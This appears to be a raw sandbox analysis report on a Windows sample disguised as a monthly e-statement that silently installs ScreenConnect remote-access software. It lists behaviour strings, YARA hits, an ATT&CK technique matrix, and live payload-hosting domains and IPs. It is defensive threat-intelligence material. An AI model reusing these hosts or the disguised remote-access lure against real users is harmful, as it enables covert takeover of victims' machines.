                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1BD4 cpuid 0_2_009A1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009A1806
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match File source: 9.0.ScreenConnect.WindowsClient.exe.ba0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 6172, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5432, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5764, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
[Behavior graph: ID 1551950; sample monthly-eStatementForum1204...; start date 08/11/2024; architecture WINDOWS; score 51]

                  No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config: | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationYDataer | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationX | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll~ | 0% | Avira URL Cloud | safe |
http://voicemail-lakeleft.top | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application% | 0% | Avira URL Cloud | safe |
https://login.ecur | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll6 | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil; | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreeP | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationY; | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowVF | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationg= | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationO$ | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationre=msil | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exeG | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_4c015cY | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exed | 0% | Avira URL Cloud | safe |
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
voicemail-lakeleft.top | 194.59.30.201 | true | false | | unknown
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
popwee2.zapto.org | 194.59.30.201 | true | false | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | high
https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe | false | | high
                                                                                                                          high
                                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil;dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/scrsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://Passport.NET/STSsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288974321.0000021CA2782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreePdfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/28svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.w3.odfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationY;ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://Passport.NET/tbsvchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288974321.0000021CA2782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2120640258.0000021CA2E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationtdfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000007.00000003.2075737545.0000021CA2727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowVFdfsvc.exe, 00000002.00000002.2983530978.0000025D396A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
